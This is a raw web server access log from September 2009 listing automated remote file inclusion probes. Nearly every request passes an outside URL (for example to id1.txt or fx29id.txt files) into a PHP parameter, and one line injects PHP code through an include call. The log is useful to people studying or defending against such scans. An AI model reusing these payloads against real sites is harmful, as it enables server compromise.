62.140.23.192 - - [10/Sep/2009:23:09:23 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:23 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:23 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:34 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:49 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:49 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:09:49 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:10:00 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:10:11 -0500] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:10:11 -0500] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:10:11 -0500] "GET /logs/access_log.1247270400/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [10/Sep/2009:23:10:24 -0500] "GET /logs/access_log.1247616000/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET /logs/access_log.1242172800//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.12.15.41 - - [10/Sep/2009:23:10:41 -0500] "GET /logs/access_log.1242172800//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [10/Sep/2009:23:12:13 -0500] "GET //include/mail.inc.php?skin_board_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
92.50.143.90 - - [10/Sep/2009:23:12:13 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
92.50.143.90 - - [10/Sep/2009:23:12:13 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [10/Sep/2009:23:12:28 -0500] "GET /logs/access_log.1242172800//include/mail.inc.php?skin_board_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:13:33 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:13:33 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:13:33 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:13:38 -0500] "GET /logs/access_log.1244505600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.200.89.25 - - [10/Sep/2009:23:13:53 -0500] "GET /logs/access_log.1245715200/become_editor.php?theme_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.200.89.25 - - [10/Sep/2009:23:13:53 -0500] "GET /become_editor.php?theme_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.200.89.25 - - [10/Sep/2009:23:13:53 -0500] "GET /logs/become_editor.php?theme_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.200.89.25 - - [10/Sep/2009:23:13:56 -0500] "GET /logs/access_log.1238112000/become_editor.php?theme_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:14:01 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:14:01 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:14:01 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.98.171.91 - - [10/Sep/2009:23:14:05 -0500] "GET /logs/e107/e107_handlers/secure_img_render.php?p=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.98.171.91 - - [10/Sep/2009:23:14:05 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.98.171.91 - - [10/Sep/2009:23:14:05 -0500] "GET /logs/access_log.1243900800/e107/e107_handlers/secure_img_render.php?p=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:23:14:06 -0500] "GET /logs/access_log.1244505600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.60.39.218 - - [10/Sep/2009:23:14:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.60.39.218 - - [10/Sep/2009:23:14:34 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.60.39.218 - - [10/Sep/2009:23:14:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
41.220.115.83 - - [10/Sep/2009:23:15:01 -0500] "GET /logs/access_log.1248048000////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
41.220.115.83 - - [10/Sep/2009:23:15:01 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
41.220.115.83 - - [10/Sep/2009:23:15:01 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.236.47.188 - - [10/Sep/2009:23:16:31 -0500] "GET /?custompluginfile[]=http://obeng.ucoz.net/fx29id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.236.47.188 - - [10/Sep/2009:23:16:31 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://obeng.ucoz.net/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.188 - - [10/Sep/2009:23:17:03 -0500] "GET /logs/?custompluginfile[]=http://obeng.ucoz.net/fx29id1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:17:32 -0500] "GET //flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:17:32 -0500] "GET /logs//flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:17:32 -0500] "GET /logs/access_log.1247961600//flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:17:32 -0500] "GET /logs/access_log.1238112000//flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:17:51 -0500] "GET /logs/access_log.1250985600/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:17:51 -0500] "GET /ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:17:51 -0500] "GET /logs/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:17:52 -0500] "GET /logs/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:17:52 -0500] "GET /ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:17:52 -0500] "GET /logs/access_log.1250985600/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
220.73.161.101 - - [10/Sep/2009:23:18:04 -0500] "GET /logs/access_log.1251763200/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.137 - - [10/Sep/2009:23:18:16 -0500] "GET /logs/access_log.1251763200/ask_password.php?dir=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:18:50 -0500] "GET /logs//flash/get_song.php?foing_root_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.75.202.55 - - [10/Sep/2009:23:18:50 -0500] "GET //flash/get_song.php?foing_root_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
62.75.202.55 - - [10/Sep/2009:23:19:41 -0500] "GET //flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:19:41 -0500] "GET /logs/access_log.1247961600//flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:19:41 -0500] "GET /logs/access_log.1238112000//flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:19:41 -0500] "GET /logs//flash/set_na.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:23:24:16 -0500] "GET //citywriter/head.php?path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:23:24:16 -0500] "GET /logs//citywriter/head.php?path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.100.186.87 - - [10/Sep/2009:23:24:16 -0500] "GET /logs/access_log.1244764800//citywriter/head.php?path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:26:56 -0500] "GET //admin/list_artists.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:26:56 -0500] "GET /logs//admin/list_artists.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:26:56 -0500] "GET /logs/access_log.1238112000//admin/list_artists.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:26:57 -0500] "GET //admin/list_artists.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:26:57 -0500] "GET /logs//admin/list_artists.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:26:57 -0500] "GET /logs/access_log.1238112000//admin/list_artists.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
81.176.226.186 - - [10/Sep/2009:23:27:31 -0500] "GET /logs/access_log.1251763200/index_principal.php?pagina=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.186 - - [10/Sep/2009:23:27:31 -0500] "GET /index_principal.php?pagina=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.176.226.186 - - [10/Sep/2009:23:27:31 -0500] "GET /logs/index_principal.php?pagina=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:33 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:33 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:33 -0500] "GET /logs/access_log.1250985600//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:33 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:46 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:46 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:46 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:23:28:47 -0500] "GET /logs/access_log.1250985600//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:29:23 -0500] "GET //flash/initialise.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:29:23 -0500] "GET /logs//flash/initialise.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:29:23 -0500] "GET /logs/access_log.1238112000//flash/initialise.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:23:33:13 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:23:33:13 -0500] "GET /logs/access_log.1244764800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:23:33:13 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:23:33:32 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:23:33:32 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
110.45.146.223 - - [10/Sep/2009:23:33:32 -0500] "GET /logs/access_log.1244764800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:33:42 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:33:42 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:33:42 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:33:42 -0500] "GET /logs/access_log.1250985600//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:34:22 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:34:22 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:34:22 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:23:34:22 -0500] "GET /logs/access_log.1250985600//admin/business_inc/saveserver.php?thisdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.73.17.7 - - [10/Sep/2009:23:34:28 -0500] "GET /logs//errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.73.17.7 - - [10/Sep/2009:23:34:28 -0500] "GET /logs/access_log.1237075200//errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.73.17.7 - - [10/Sep/2009:23:34:28 -0500] "GET //errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.73.17.7 - - [10/Sep/2009:23:34:28 -0500] "GET /logs/access_log.1236211200//errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.148.68.101 - - [10/Sep/2009:23:34:40 -0500] "GET /login.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
66.148.68.101 - - [10/Sep/2009:23:34:40 -0500] "GET /logs/login.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
66.148.68.101 - - [10/Sep/2009:23:34:47 -0500] "GET /login.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
66.148.68.101 - - [10/Sep/2009:23:34:47 -0500] "GET /logs/login.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
62.75.202.55 - - [10/Sep/2009:23:34:54 -0500] "GET /logs/access_log.1238112000//flash/initialise.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:34:54 -0500] "GET //flash/initialise.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:34:54 -0500] "GET /logs//flash/initialise.php?foing_root_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:23:38:16 -0500] "GET //include/write.php?dir=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:23:38:16 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:23:38:16 -0500] "GET /logs//include/write.php?dir=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
117.110.59.2 - - [10/Sep/2009:23:38:51 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:39:32 -0500] "GET /logs//admin/edit_album.php?foing_root_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.75.202.55 - - [10/Sep/2009:23:39:32 -0500] "GET //admin/edit_album.php?foing_root_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
62.75.202.55 - - [10/Sep/2009:23:39:36 -0500] "GET /logs//admin/edit_album.php?foing_root_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.75.202.55 - - [10/Sep/2009:23:39:36 -0500] "GET //admin/edit_album.php?foing_root_path=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
62.75.202.55 - - [10/Sep/2009:23:40:02 -0500] "GET //admin/edit_artist.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:40:02 -0500] "GET /logs//admin/edit_artist.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:23:40:02 -0500] "GET /logs/access_log.1238112000//admin/edit_artist.php?foing_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.191.68.53 - - [10/Sep/2009:23:41:52 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.191.68.53 - - [10/Sep/2009:23:41:52 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.191.68.53 - - [10/Sep/2009:23:41:52 -0500] "GET /logs/access_log.1248048000////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
65.55.106.159 - - [10/Sep/2009:23:42:07 -0500] "GET /logs/access_log.1246752000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
199.120.90.223 - - [10/Sep/2009:23:42:31 -0500] "GET /setup.php?dir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
